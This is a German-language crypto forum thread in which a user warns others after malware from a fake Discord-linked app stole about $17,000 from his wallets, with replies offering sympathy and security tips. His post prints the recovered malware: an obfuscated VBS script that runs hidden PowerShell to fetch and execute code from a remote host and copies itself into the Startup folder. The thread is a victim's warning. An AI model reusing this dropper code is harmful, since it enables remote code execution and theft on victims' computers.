Author

Topic: [warnendes Beispiel] gehacked Discord DM Fake Internetseite und eigene Dummheit (Read 272 times)

legendary
Activity: 2660
Merit: 2229
https://t1p.de/6ghrf
Oh, nullcoiner. Das tur mir leid für dich. 17k ist eine Menge Kohle. Vielen Dank das du uns hier warnst und soviel Recherche betrieben hast.

Generell kann man nur jeden empfehlen einen Extra (Krypto) PC mit Linux aufzusetzen und mit virtuellen Maschinen zu arbeiten. Das reduziert das Risiko enorm und alles, was mit Kypto zu tun hat, sollte vom normalen Arbeits-PC weg.



Gibt es hier irgendwo im Forum diesbezüglich einen Thread? Also ich meine nicht nur bezogen auf die Walletsicherheit, sondern der wirklich alles abdeckt. Anonymität, Sicherheit, welche Firewall/welches Antivirenschutzprogramm usw. Das wäre prima, wenn da jemand etwas hätte.

Wir haben in den letzten Jahren immer wieder Threads erstellt, die sich mit diesen Themen befassen.
Auf die schnelle habe ich das hier gefunden. Aber wir haben noch viel viel mehr. Bin mir gar nicht sicher, ob wir nicht auch eine interne Linkliste mit deutschen Threads haben?  Huh

Security 1x1 - Teil 1: Sichere Passwörter
Good topics on security and privacy
hero member
Activity: 868
Merit: 513
da meine Sicherheitsvorkehrungen bisher eher miserabel waren muss ich ehrlich gestehen. Also hat deine (schmerzvolle) Erfahrung auch durchaus seine guten Seiten.

Na dann solltest du deine Sicherheitsvorkehrungen aber schnellst möglich erhöhen oder bzw ändern.
Wie schnell es gehen kann hast du ja hier gesehen , ein falscher klick und es ist geschehen um dich.
Im schlimmsten fall werden sogar Login daten gehackt die eventuell mit online banking zu tun haben .

Wie schnell das gehen kann hab ich hier als ich am anfang im forum unterwegs war selbst gemacht.
Ein falscher klick und innerhalb von 10 minuten waren alle Coins weg usw.
Deswegen fighte ich auch so sehr gegen malware sachen das anderen nicht das passiert was mir damals passiert ist.
Gibt es hier irgendwo im Forum diesbezüglich einen Thread? Also ich meine nicht nur bezogen auf die Walletsicherheit, sondern der wirklich alles abdeckt. Anonymität, Sicherheit, welche Firewall/welches Antivirenschutzprogramm usw. Das wäre prima, wenn da jemand etwas hätte.
legendary
Activity: 3178
Merit: 3295
da meine Sicherheitsvorkehrungen bisher eher miserabel waren muss ich ehrlich gestehen. Also hat deine (schmerzvolle) Erfahrung auch durchaus seine guten Seiten.

Na dann solltest du deine Sicherheitsvorkehrungen aber schnellst möglich erhöhen oder bzw ändern.
Wie schnell es gehen kann hast du ja hier gesehen , ein falscher klick und es ist geschehen um dich.
Im schlimmsten fall werden sogar Login daten gehackt die eventuell mit online banking zu tun haben .

Wie schnell das gehen kann hab ich hier als ich am anfang im forum unterwegs war selbst gemacht.
Ein falscher klick und innerhalb von 10 minuten waren alle Coins weg usw.
Deswegen fighte ich auch so sehr gegen malware sachen das anderen nicht das passiert was mir damals passiert ist.
hero member
Activity: 868
Merit: 513
Das tut mir mega leid Nullcoiner! Aber nicht unterkriegen lassen und einfach weitermachen. Wie sagt es sich so schön: Lehrgeld zahlt an nur einmal. Durch deinen Erfahrungsbericht werde ich definitiv auch etwas umsichtiger handeln, da meine Sicherheitsvorkehrungen bisher eher miserabel waren muss ich ehrlich gestehen. Also hat deine (schmerzvolle) Erfahrung auch durchaus seine guten Seiten.
legendary
Activity: 2702
Merit: 1080
So mal ein kleiner Erfahrungsbericht als warnendes Beispiel, wobei viele sicher vorsichtiger sind als ich.


kann mann die oben angeführte problematik durch das Anklicken eines Links auch hervorrufen? Einfacher ausgedrückt, gibt es Möglichkeiten wie man als Hacker die Downloadbestätigung umgehen kann?

Ja, selbst auf eigentlich seriösen Seiten kann dir im schlimmsten Fall Schadsoftware untergeschoben werden, sei es durch einen Hack der Website oder einfach durch ein manipuliertes Werbebanner welches Schadcode beinhaltet - Malvertising. Ein eingeschränktes Benutzterkonto, ohne Admin Rechte, kann manchmal helfen den Spielraum der im Hintergrund ausgeführten Schadsoftware zu begrenzen oder deren Installation zu verhindern.


Ein sehr guter Tipp finde ich, werde ich gleich mal bei mir am Laptop die Einstellungen kontrollieren. Grundsätzlich benutze ich meinen Laptop mittlerweile kaum mehr für etwas anderes wie meine Kryptos - aus Furcht es könnte was passieren.
legendary
Activity: 1457
Merit: 1033
@ nullcoiner
falls du bei Hashcat Hilfe brauchst melde dich,.... damit kenn ich mich ganz gut aus  Roll Eyes
legendary
Activity: 1078
Merit: 1307
So mal ein kleiner Erfahrungsbericht als warnendes Beispiel, wobei viele sicher vorsichtiger sind als ich.

Danke für deine Warnung und den sehr offenen Erfahrungsbericht, tut mir echt leid für deinen Verlust, mit ~17k $ hätte man sich ja doch den ein oder anderen Traum erfüllen können.

Das viele vorsichtiger sind als du, glaube ich noch nicht einmal denn gerade dein Beispiel zeigt ja wie eine klitzekleine Ablenkung zu solch einem Ergebnis führt. Das kann jedem passieren.
Klar gibt es hier viele User welche sich mit der ganzen Materie auskennen und auch entsprechend vorsichtig sind. Wenn man aber überlegt wie vielen "Neuinvestoren" in den letzten Monaten dazu gekommen sind, welche vielleicht nicht so stark für dieses Thema sensibilisiert sind kann man erahnen was für Schadensummen pro Jahr durch solche Schadsoftware entsteht.

Ich werde diesen Thread auf jeden Fall im Hinterkopf behalten und einigen Personen zum lesen zeigen, von denen ich weiss das diese relativ arglos im Netz unterwegs sind.


kann mann die oben angeführte problematik durch das Anklicken eines Links auch hervorrufen? Einfacher ausgedrückt, gibt es Möglichkeiten wie man als Hacker die Downloadbestätigung umgehen kann?

Ja, selbst auf eigentlich seriösen Seiten kann dir im schlimmsten Fall Schadsoftware untergeschoben werden, sei es durch einen Hack der Website oder einfach durch ein manipuliertes Werbebanner welches Schadcode beinhaltet - Malvertising. Ein eingeschränktes Benutzterkonto, ohne Admin Rechte, kann manchmal helfen den Spielraum der im Hintergrund ausgeführten Schadsoftware zu begrenzen oder deren Installation zu verhindern.
legendary
Activity: 2702
Merit: 1080
Danke für das Teilen und 17k sind tatsächlich eine ordentliche Summe, das tut mir leid für dich aber am besten abschreiben und in die Zukunft schauen. Ich frage mich zwar ob es folgende Möglichkeit gibt aber eigentlich besteht sie sicher: kann mann die oben angeführte problematik durch das Anklicken eines Links auch hervorrufen? Einfacher ausgedrückt, gibt es Möglichkeiten wie man als Hacker die Downloadbestätigung umgehen kann?
legendary
Activity: 2688
Merit: 1480
till 25.07
Danke für eure Anteilnahme und Zusprüche. Und danke nochmal für deinen Link Lafu. Leider zu spät gesehen, aber wahrscheinlich hätte es nichts geholfen. Ich lösche auch bald täglich solche Direktnachrichten, aber an diesem Tag war ich mehr als unachtsam, blöd um's frei raus zu sagen. Wenn's bei dem Verlust bleibt, bin ich mit einem blauen Auge davon gekommen, ich frage mich immer noch wie sie die keystores "knacken" konnten. Was ich gestern gesehen habe, ist dass sie nur mit AES 128 verschlüsselt sind.

Aus meinem Peculium keystore
Code:
{"address":"17feb96299b82be9867aff936dbfe52fba2a0063","crypto":{"cipher":"aes-128-ctr"...

Vielleicht war auch einfach tatsächlich die Verschlüsselung zu schwach, ich werde mal versuchen mich mit hashcat auseinanderzusetzen, was ich da gesehen habe, ist das ein mächtiges Tool um Passwörter zu knacken, dass alle möglichen Verschlüsselungen und Angriffsarten unterstützt.
legendary
Activity: 3178
Merit: 3295
Da verweise ich doch mal direkt zu meinem Thread den ich vor fast einem Jahr bereits erstellt habe !

Discord App Client kann eure Passwörter , Coins stehlen über PM Links !

Grundsätzlich sollten alle pm die über Discord bekommt genau gelesen werden und zu dem eventuell auch noch auf der Webseite und in dem Discord channel gecheckt werden.
Ich bekomme täglich solche pm und meistens bzw immer sind es fake pm .

Habe aber in meinem Thread bereits vor solchen sachen gewarnt !
hero member
Activity: 1442
Merit: 590
einem Bekannten von mir ist auf ähnliche Weise der gesamte Computer leergeräumt worden, nicht nur alle Wallets, die er auf dem Computer hatte, sondern es wurden auch sämtliche Passwörter ausgespäht, mit denen er sich bei den Börsen anmelden konnte. Der Schaden betrug ungefähr 25 Millionen Euro. Als ich davon gehört habe, habe ich mir umgehend einen zweiten Computer angeschafft. Diesen benutze ich weder für Internet noch für Emails. Der wird nur aufgeklappt, wenn ich eine Transaktion machen möchte, was eigentlich recht selten vorkommt.


Wer bei 25m kein 2FA nutzt und keinen Hardware Wallet hat und dem ist halt auch nicht mehr zu helfen.

@nullCoiner
Beileid zum Verlust, aber Danke für den nochmaligen Hinweis wie wichtig es ist, vorsichtig zu sein und einen Hardware Wallet auch zu nutzen.
staff
Activity: 2548
Merit: 2709
Join the world-leading crypto sportsbook NOW!
Sehr wild aber danke für die Info + Warnung nullCoiner!
17k USD ist natürlich ein großer Verlust aber ich hoffe du kannst nun zumindest wieder beruhigt schlafen... dein System ist hoffentlich wieder sauber und die Daten sicher.

Zeigt aber auch wie schnell es gehen kann... und das auch für vorsichtige und erfahrene User. Was denkst du wie es Leuten in diesem Umfeld geht die nicht so viel wert auf Sicherheit legen oder einfach das KnowHow fehlt.
Ich selbst wäre bei Einrichtung meines neuen Clients fast über den Stolperstein einer Phishing-Seite zu Ledger Live gestolpert Shocked Da wurde es mir richtig warm als ich den Fehler bemerkt habe.

Ich werde das jetzt zum Anlass nehmen und alte Wallets + .json bereinigen die sowieso auch in Keepass abgelegt sind. Sicher ist sicher.
member
Activity: 114
Merit: 45
einem Bekannten von mir ist auf ähnliche Weise der gesamte Computer leergeräumt worden, nicht nur alle Wallets, die er auf dem Computer hatte, sondern es wurden auch sämtliche Passwörter ausgespäht, mit denen er sich bei den Börsen anmelden konnte. Der Schaden betrug ungefähr 25 Millionen Euro. Als ich davon gehört habe, habe ich mir umgehend einen zweiten Computer angeschafft. Diesen benutze ich weder für Internet noch für Emails. Der wird nur aufgeklappt, wenn ich eine Transaktion machen möchte, was eigentlich recht selten vorkommt.
full member
Activity: 447
Merit: 153
Danke für den Bericht und Beileid zum Verlust.
Ist auf jeden Fall eine Warnung, dass auch im Umgang mit Keypass Vorsicht geboten ist, welches ich auch recht intensiv im Einsatz habe.
Auch dass man nicht so arrogant sein sollte zu glauben, dass man selbst vor Scams gefeit ist.
Keylogger oder insb. Clipboard-Logger sind wirklich fatal, wenn man gelegentlich mit Private Keys hantiert.
legendary
Activity: 2688
Merit: 1480
till 25.07
So mal ein kleiner Erfahrungsbericht als warnendes Beispiel, wobei viele sicher vorsichtiger sind als ich.

In einem Moment der Unachtsamkeit am 27.04, habe ich eine DM in Discord mit einer Nachricht aus dem Avalanche Announcements verwechselt. Irgendwie habe ich da einen 5 Min Aussetzer gehabt oder war nicht bei der Sache/abgelenkt.



Die Seite sah "vertrauenswürdig" aus, das Zertifikat hat auch gepasst, und so wollte ich mir die App ansehen. Datei runtergeladen, beim Installationsversuch eine Warnung erhalten und diese ignoriert.  Cry

Schnell wurde mir klar, dass ich scheisse gebaut habe. Im Avalanche Discord kamen auch schon die ersten Meldungen und Warnungen, dass auch andere Nutzer diese Nachricht bekommen haben und dies ein Scam ist.
Ich habe dann gleich wieder alles deinstalliert und auch den Virenscanner nochmal explizit drüber laufen lassen und auch eine .vbs aus dem Autostart gefischt.

Dachte, damit hat es sicher erledigt.

Dem war leider nicht so. Am 15.05 wollte ich mal wieder nach meinen PCL schauen, und musste feststellen, dass alle PCL und ein paar ETH Krümel von meinem Konto abgezogen wurden.
Als ich auf die ETH Adresse geschaut habe, sah ich dann noch andere Token von mir dort, nämlich ein paar Auctus
https://etherscan.io/address/0x827b0668dfe17e42727bac902526cf6676c24a79

Nach weiter Prüfung fand ich noch ein drittes Account das leer war, dort wurden aber nur die verblieben ETH abgezogen, da die Token nichts wert waren.
Am 10.05 hatte der Angreifer die ETH dann abgezogen [/url=https://etherscan.io/address/0xc9ddd5bd26f9a1260e6f24d0644c140c390c8a08]. Das [url=http://Konto]Konto, auf welches meine funds abgezogen wurden gibt es übrigens schon seit 2018  Embarrassed und es gibt da leider über 500 Transaktionen...

Da ich nicht wusste wie und wo der Angreifer Zugriff bekommen konnte habe ich dann angefangen zu suchen. Schnell wurde klar, dass es zeitlich genau mit der DM und meiner bullshit Aktion passte.
Ich habe dann nochmals genauer meinen PC geprüft und musste feststellen, dass am 14.05 eine Tevvvvvst.vbs von der Antivirensoftware aus meinem Autostart gezogen wurde. Leider wurde sie dort immer wieder hin kopiert. Der Angreifer hatte also immer noch Zugang... (ich habe später übrigens noch eine .vbs mit dem selben Inhalt gefunden, was wohl die Kopiervorlage aber mit anderem namen war...)

Code:
Set vvvvvvvvvvvvvvnnnnnnnnnnnnnn = CreateObject("WScript.Shell")


ddddddddddddddddddddd="cmd.exe /c"
qqqaaaaaaaaaazzzzzzzzzz = StrReverse(" l"+"le"+"hs"+"re"+"wo"+"P")



   vvvvvvvvvvvvvvnnnnnnnnnnnnnn.Run(ddddddddddddddddddddd+qqqaaaaaaaaaazzzzzzzzzz+"  Inv"+"oke-Exp"+"res"+"sion((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'Webc'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('h t t p s ://zapper.ws/test.jpg'))));exit "), CONSOLE_HIDE, CMD_WAIT
Set vvvvvvvvvvvvvvnnnnnnnnnnnnnn = Nothing
WScript.Sleep (60000)
on error resume next
Const ssfSTARTUP = &H7
Set fso=CreateObject("Scripting.FileSystemObject")
Set oShell = CreateObject("Shell.Application")
Set startupFolder = oShell.NameSpace(ssfSTARTUP)
currentPath = fso.GetAbsolutePathName(wscript.scriptfullname)
If Not startupFolder Is Nothing Then
st1="."
st2="v"+"b"
st3="s"
fso.CopyFile currentPath, startupFolder.Self.Path & "\Tevvvvvst" + st1 + st2 + st3
End If

WScript.Quit()

Ein geo nslookup auf h t t p s ://zapper.ws/test.jpg führt zu Servern auf den Sychellen.
Quote
IP General InformationIP Address:185.212.130.65Hostname:185.212.130.65ISP:Internet It Company IncIP Geolocation InformationContinent:Africa (AF)Country:Seychelles (SC) SC

Die Dateien auf zapper.ws gehören vermutlich zu irgendwelchen exploit kits.... Roll Eyes

Die Frage war nur wie er die Konten leer räumen konnte... Hatte er Zugriff auf mein Metamask, oder gar Zugriff auf mein Keepass. Liefen vielleich key- oder screen logger mit...Da kommt dann schon leicht "Panik" auf. Ich habe lange gesucht und folgendes Muster gefunden....

Die drei Konten die leer geräumt waren, hatte ich alle vor langer Zeit mal im Ethereum Wallet "Mist". Ich hatte darin noch mehrere Konten, aber auf einigen waren einfach nur Token ohne ETH, so dass keine Sende-Gebühren bezahlt werden konnten. Und die verschlüsselten .json Dateien lagen ebenfalls auf meinem PC. Die Passwörter für die Dateien sind aber 14-15 Zeichen mit Zahlen, Groß-Kleinschreibung und Sonderzeichen das schafft man weder mit bruteforce noch mit rainbow table in der kurzen Zeit. Also musste der Angreifer anderweitig Zugriff bekommen haben...

Ich habe dann zunächst mal meinen Windows 10 PC neu aufgesetzt neues Keepass Dateien und Metamask Dateien erstellt und meinem Portfolio nach neue Konten erstellt, die Funds überwiesen und wieder restaked, z.B. XTZ und Waves. Auch alle verblieben (nennenswerten) ehml. Mist ETH Token habe ich auf neue Konten verschoben. Bei der Diskussion mit unserem ChefImGartenPavillion (nochmal danke für die Zeit und Unterstützung!) bin ich dann auf folgendes Paper gestoßen:
https://www.researchgate.net/publication/337610456_Attainable_Hacks_on_Keystore_Files_in_Ethereum_Wallets-A_Systematic_Analysis

Dort gibt es folgende Passage:
Quote
There is no encryption applied to the keystore file and it is stored in a plaintext file with content in JSON format. Any malicious user who has access to the Ethereum wallet file directory, can steal this file and use hashcat to crack its password.

Nachdem ich das geprüft habe, war es tatsächlich so, dass ich noch diese alten keystore files auf meiner hdd hatte. Und soweit ich das paper richtig verstanden habe, kann man wohl mit Zugriff auf die keystores mit hashcat auch die Konten auslesen...

Es sind natürlich alles Annahmen und ich hoffe, das ich richtig liege und nicht noch mehr kommt. Gerade meine AVAX sind noch ein paar Tage im Staking bevor ich sie auf ein neues Konto transferieren kann.
Aber die Moral von der Geschichte ist: -> nicht blöd sein  Cheesy -> Hardware Wallet und falls nicht -> Keepass, keystores und .json Datein möglichst nicht auf dem PC halten, dann lieber extern mit entsprechenden Sicherungen.

Abgesehen von der tagelangen Arbeit und den schlaflosen Nächten, hat mich das ca. ~$17.000 USD Lehrgeld gekostet. Ich muss mal sehen, ob ich noch zur Polizei gehe. Meinen PC habe ich ja neu aufgesetzt und damit die "Spuren" verwischt, ein Image etc. war mir zu aufwendig, ich hatte andere Prioritäten. Bei der Adresse die es seit 2018 gibt, sind auch einige withdraws von Binance, Huobi und anderen Börsen, vielleicht schreibe ich die noch an, aber ob da was raus kommt. Bei etherscan.io wollte ich die Adresse melden, aber die wollen irgendwelche Screenshots von Phisihing Seiten, das war bei mir ja nicht nötig Tongue

Falls nochmal was (weg) kommt melde ich mich wieder Tongue


Jump to: